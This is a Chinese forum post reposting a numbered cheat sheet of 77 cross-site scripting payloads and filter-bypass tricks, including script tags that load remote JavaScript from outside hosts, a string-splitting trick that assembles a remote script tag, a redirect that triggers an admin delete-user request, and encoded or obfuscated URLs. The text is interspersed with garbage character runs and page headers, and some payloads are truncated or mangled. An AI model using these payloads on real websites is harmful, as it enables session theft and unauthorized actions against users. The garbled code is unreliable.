貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
7 M+ }% |$ [+ f6 b5 V d(1)普通的XSS JavaScript注入9 y8 D7 [7 L+ F2 O
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! y( f$ J5 R3 c9 i(2)IMG标签XSS使用JavaScript命令
: k. k" g# ^5 s! n1 f( V/ i<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 Q3 G f/ h/ M# ~$ m2 H6 J1 d/ @' ^
(3)IMG标签无分号无引号# Y6 p6 ]5 L7 g6 i: c# P6 k y4 `
<IMG SRC=javascript:alert(‘XSS’)>* c1 H( V( X3 T0 x+ e$ Q
(4)IMG标签大小写不敏感
9 x/ _+ ?+ }4 M$ ]$ ^) `# P' s$ z<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) c5 j' ~6 A# N/ n
(5)HTML编码(必须有分号)
+ z& V" B( _2 Z! X. N( s7 n<IMG SRC=javascript:alert(“XSS”)>/ m5 O% D! N0 [0 j
(6)修正缺陷IMG标签" }$ J/ P+ u. q3 r
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- c9 a) j( G9 }5 Y& a0 k; K( i; C
9 n% S$ q# e. N& q( b
(7)formCharCode标签(计算器)
' h) j) Q' r' Q8 R8 ]<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>. ~5 x# n3 k* o& Z9 T9 b% I
(8)UTF-8的Unicode编码(计算器)
' t/ M; f5 p" u$ X# u4 Q! V<IMG SRC=jav..省略..S')>
$ U. Y+ F0 Q& g# P# |7 u. {# S(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
+ w `1 N# a/ B8 m<IMG SRC=jav..省略..S')>3 M, M% U3 X% [2 K( ]
(10)十六进制编码也是没有分号(计算器)1 ]& J% r0 b6 w, s P
<IMG SRC=java..省略..XSS')>
4 \5 | o1 Q! x) B(11)嵌入式标签,将Javascript分开* m; v/ E) A! i6 c
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& l7 U6 g9 E" R4 v: I(12)嵌入式编码标签,将Javascript分开
9 V+ q, p! F1 `: c/ }) O& u( r<IMG SRC=”jav ascript:alert(‘XSS’);”>$ `9 b$ v( [- Q1 Z& {1 v8 y
(13)嵌入式换行符7 Y# Y) @8 o5 C9 O
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: @; l+ q( |% ^% Z4 Z; Y# X(14)嵌入式回车, n* f* j5 P4 ^. Q6 w+ c
<IMG SRC=”jav ascript:alert(‘XSS’);”>1 ~; F" K/ P' c: a; \
(15)嵌入式多行注入JavaScript,这是XSS极端的例子* S: W+ C7 }* v7 W. f4 R
<IMG SRC=”javascript:alert(‘XSS‘)”>
. Z7 ~. j$ R6 j J3 f(16)解决限制字符(要求同页面)
- Z+ a, N+ B! f+ x$ ~<script>z=’document.’</script>/ p {1 Z0 {1 P; X8 U- e
<script>z=z+’write(“‘</script>
# C* z1 v, d( z; k# d! n) Q<script>z=z+’<script’</script>
]) Y# Q1 W4 H<script>z=z+’ src=ht’</script>. d7 | P' `2 O. o
<script>z=z+’tp://ww’</script>
0 D6 X% o3 q1 A; R2 W% r<script>z=z+’w.shell’</script>
9 F: Z C% j2 |$ G: R<script>z=z+’.net/1.’</script>
# Z, l% P3 F& u w) Y$ e; w<script>z=z+’js></sc’</script>
, U2 \% B) M) Y) F<script>z=z+’ript>”)’</script>
9 w. I* P' c& c3 c- s+ T<script>eval_r(z)</script>/ o( V* V* s' }3 }
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
" V& j. c) {$ |. T6 Fhttps://www.t00ls.net/viewthread ... table&tid=15267 2/65 C0 X+ w9 U) z6 X1 E' J3 x3 e; t
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
, o s7 N0 e+ ^; a I$ W* P9 {(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) [/ ~4 ] w! y3 F7 B- Z( D
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# ?5 r6 a$ I$ c& T
(19)Spaces和meta前的IMG标签
% }$ O0 I. c. `- [* I8 s2 |, V+ _! h<IMG SRC=” javascript:alert(‘XSS’);”>$ d: ]9 M0 [3 _) c6 I& ^9 q1 ?
(20)Non-alpha-non-digit XSS. {; N7 R; L. n% F% h2 |7 y
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, k4 Q0 U/ Y" a! \2 O) y, K(21)Non-alpha-non-digit XSS to 2
$ B% F* k7 ?( u v<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 y/ z9 G/ ?& |2 A6 z4 V
(22)Non-alpha-non-digit XSS to 3, \$ D0 y5 Q1 W- X$ `. r
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 Z6 I7 q6 c. T- |, z9 ^(23)双开括号
1 q0 H; p% X v5 e2 o<<SCRIPT>alert(“XSS”);//<</SCRIPT>7 H K7 ]+ b5 x5 ^2 _
(24)无结束脚本标记(仅火狐等浏览器)
2 z) j0 i: a7 b5 Z% e, ^, H/ G( L<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! f/ j" h5 y; w8 t# W5 m' R
(25)无结束脚本标记2
g! u' J8 M+ u( l1 [5 o/ T<SCRIPT SRC=//3w.org/XSS/xss.js>/ S. I B% L& X% P c
(26)半开的HTML/JavaScript XSS, {2 J6 x) k: f8 |7 B
<IMG SRC=”javascript:alert(‘XSS’)”! D P( L/ |1 {3 H9 C0 m+ Z5 A
(27)双开角括号
6 T) \$ c' G9 N0 k9 J+ d, k<iframe src=http://3w.org/XSS.html <
- g8 ^& t5 y7 Q( b& u& N6 q4 S(28)无单引号 双引号 分号5 Y( b+ I, p% c2 S: A
<SCRIPT>a=/XSS/: [: l0 q/ d$ Z. N1 S1 @" M6 D
alert(a.source)</SCRIPT>( J# x5 [/ L. ~- e$ L j j( v N
(29)换码过滤的JavaScript
8 T' j1 s: @1 ^$ l; t9 J\”;alert(‘XSS’);//
`, Z! H8 s M* L2 O" g4 F9 ] P(30)结束Title标签
# x# e3 G/ |! u0 \& S* ?</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>9 Y1 h. q' t: M1 s
(31)Input Image: M/ w, E/ t i& y+ i2 N, J- l
<INPUT SRC=”javascript:alert(‘XSS’);”>
- d8 U8 g4 m+ [- a$ r, _* e7 R(32)BODY Image
& {4 X: k) L% ]<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
3 s) B& g- I& }, L+ T(33)BODY标签& y a5 W& ~$ J! u
<BODY(‘XSS’)>2 ]0 Y% z) E. P: q) x
(34)IMG Dynsrc! _. t. S* |( {; [$ K9 i
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
/ X; g0 U5 R. q( k(35)IMG Lowsrc$ I: i+ }# v1 G0 v, n, i" U* E3 J \
<IMG LOWSRC=”javascript:alert(‘XSS’)”>- h9 J* M1 G" W4 N
(36)BGSOUND! Q% m- k( |( Z7 a0 U0 j
<BGSOUND SRC=”javascript:alert(‘XSS’);”>' y2 s5 u5 t) V: @
(37)STYLE sheet
" m: k" E: U7 S! J8 G2 S5 M<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
8 T- ^" U1 d; ?% c w(38)远程样式表; n, h1 J# V8 R& q0 \
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
+ P5 K2 h" ^0 ^9 F* | C& H3 A+ }% X(39)List-style-image(列表式)
6 p# X0 C4 s) K<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS; W2 W4 C4 c1 Q, {( D
(40)IMG VBscript$ Q5 n$ g3 z/ Q- \1 O# F
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 J7 n }0 h* T3 j(41)META链接url
) k5 p6 h) P$ Z' O+ Y% N, W+ P5 i& r( P0 `- j$ D8 e! F0 [% d
2 k; \* R8 g4 m" E! z. A0 T/ r
<META HTTP-EQUIV=”refresh” CONTENT=”0;" A8 N2 V1 A4 d
URL=http://;URL=javascript:alert(‘XSS’);”>5 r1 b1 i0 k; y3 V# \# T0 T$ p
(42)Iframe
: c0 S! V0 o0 V<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>( v) ]) }+ R; J5 ]# t# F1 x
(43)Frame
* A3 U: C$ K- [& T w9 m9 S' o<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
0 i" c" G% ]6 d7 ^" E9 j p o* b! Shttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
0 R$ y+ g9 y7 r! I(44)Table
: G4 S& Z/ l Z" m& Y! G( ]' B<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
0 K8 Y& H1 g* X' D; ?7 y$ q' A$ @0 D(45)TD
' Z, t1 Y0 R0 y* E<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>5 G5 v+ x0 H4 b3 L' @
(46)DIV background-image3 R2 F2 y! b, \7 |; }
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" [3 W& `7 C: S* {0 {
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
4 k; w7 K: y" k+ }3 I8&13&12288&65279)9 J5 o/ Q7 f3 M& J; }
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
3 y7 b" N% O* d: \, i9 N9 b(48)DIV expression
& C( P1 y6 V0 J( k7 M. n$ g- k: P<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
: Y1 g5 s1 ^% {# {7 y4 c$ ?(49)STYLE属性分拆表达* a. m6 J) t0 \) a
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
- R f0 F7 X/ ~3 i# q/ s. l(50)匿名STYLE(组成:开角号和一个字母开头)( d0 c+ O# l( }" P7 f! W
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>- b* P/ z& k5 D
(51)STYLE background-image0 b; O8 c4 t3 C+ s9 i% y% c) U
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
' s$ H# d" f! E7 y7 W$ N7 X8 L+ H: XCLASS=XSS></A>: I& O; H4 Q8 O6 x; \ u
(52)IMG STYLE方式
. Q$ c$ `) ~. m- [! wexppression(alert(“XSS”))’>
1 _7 [6 C. O6 |. G) s+ M3 A' R3 q- P(53)STYLE background
0 s# r2 k6 p9 [$ z<STYLE><STYLE
: g8 h4 g* O5 U/ T/ etype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 @2 |9 o$ R* _4 T9 _1 a
(54)BASE
+ i7 o5 m3 j9 z4 H3 r! \1 i3 p<BASE HREF=”javascript:alert(‘XSS’);//”>1 O" I- D p4 J
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- j; ]$ v" S# m' J
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>- t: D) z: y" n! v7 U* k5 \- w# w
(56)在flash中使用ActionScrpt可以混进你XSS的代码% n( I3 H0 c; |3 X! E c
a=”get”;
1 i$ G& ` [& b+ f( S" S! `' ab=”URL(\”";% w8 x; V+ @3 f' ~- }1 y% T% J
c=”javascript:”;( o( q- B! E4 b# r6 Q7 S
d=”alert(‘XSS’);\”)”;
* _- s- G0 j5 m _$ m/ Seval_r(a+b+c+d);& U( h7 _% X& _3 l) Z/ J
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上- s& Y+ a# E- {, w5 R! m
<HTML xmlns:xss>
& ?5 @# n1 G; G! {4 n6 U% \+ ?4 M0 Y+ Z<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
! K4 @5 E5 G& E0 B! I<xss:xss>XSS</xss:xss>
, m$ l- E* r \* r) ?* j: Q2 G</HTML>
7 ~1 b) n& R! B2 j; F* G6 X# _(58)如果过滤了你的JS你可以在图片里添加JS代码来利用9 O; }& c# w. }2 J* h
<SCRIPT SRC=””></SCRIPT>
0 m8 p; r% r8 v a4 z(59)IMG嵌入式命令,可执行任意命令
6 G" S; e6 n) R( r<IMG SRC=”http://www.XXX.com/a.php?a=b”>, ~* W/ a- a/ M( ]. f! c3 g
(60)IMG嵌入式命令(a.jpg在同服务器)
5 a. o* x X" `Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
* v, j9 l& H/ L% r1 a(61)绕符号过滤
$ u: F; L/ ^& E' H# E+ T<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( J+ @6 \( x3 s* s) c(62)
; x% c3 j. c' z: l6 s6 _<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>) z# n. U, E( ~$ ?$ M; r B0 y* x; I
(63)
1 y+ p3 A) K. e- U# K# v g<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
4 @! A: ?4 p% L/ L& [) X+ `(64)
2 W- n, }# _5 ^% W' w' e+ X: U- m3 K<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>( B, [% `; Y0 h A6 {& Z2 B
(65)
; l: G$ r7 q* R' T( G9 \. U0 I/ ~. F<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>$ s* w2 \% p1 ~# ?3 f% H, S3 R3 r3 V
(66)12-7-1 T00LS - Powered by Discuz! Board
5 i! Y- v% [1 a4 uhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
! t- ?9 @: d0 L9 l _) {0 [<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
: n' u& _7 r: r/ Q5 M) L; F' K; k(67)
1 r8 l9 c; z4 M; U; N. w3 M<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>8 t1 }9 j4 B* R7 W
</SCRIPT>, N4 v! b: L+ G
(68)URL绕行: u/ o+ }, v9 E+ Q
<A HREF=”http://127.0.0.1/”>XSS</A>/ |& E/ ?6 R/ h6 d, ^: _5 T& K4 ]
(69)URL编码
, P4 R# C. a; x<A HREF=”http://3w.org”>XSS</A>% `" X% c" a) ~6 r/ @, R3 p0 H- S- m
(70)IP十进制3 j7 W) B' G! e8 V
<A HREF=”http://3232235521″>XSS</A>. M4 z" j8 X% r* W6 ?
(71)IP十六进制
6 }: Q5 p J) v% o4 l2 u1 N<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 i4 ^7 ^5 X7 R: D8 B(72)IP八进制0 z! J' v2 ]3 Q0 \
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
/ N/ `2 S3 T8 x: E8 L- t(73)混合编码6 \6 f% a! G/ k! L# O+ S& R0 b
<A HREF=”h) T7 V' \$ s9 R: s7 Q
tt p://6 6.000146.0×7.147/”">XSS</A>9 I6 B- ?- I5 r1 _ v+ A" ^
(74)节省[http:]9 x& ~6 ^( I! x3 }! u1 y
<A HREF=”//www.google.com/”>XSS</A>
/ f( P' u. P* p4 Y4 L( X(75)节省[www]5 r! p& t4 _" b; ]+ J+ |, T0 a8 ?
<A HREF=”http://google.com/”>XSS</A> Z, d0 Z% ^$ L3 U- b$ f
(76)绝对点绝对DNS, j. x' S8 J5 S4 ?/ y+ a: j% H
<A HREF=”http://www.google.com./”>XSS</A>
1 ^& s4 R% |, s, L: @(77)javascript链接
1 V: F M1 [: ~! L<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>" R7 I$ ^9 O; W0 m x4 v
1 d1 D& o4 I* F( @" a
原文地址:http://fuzzexp.org/u/0day/?p=143 R% h% G" V2 u2 D8 x( \$ F6 i
B# I( U' [% A |
发表于 2013-4-19 19:22:37
收藏
支持
反对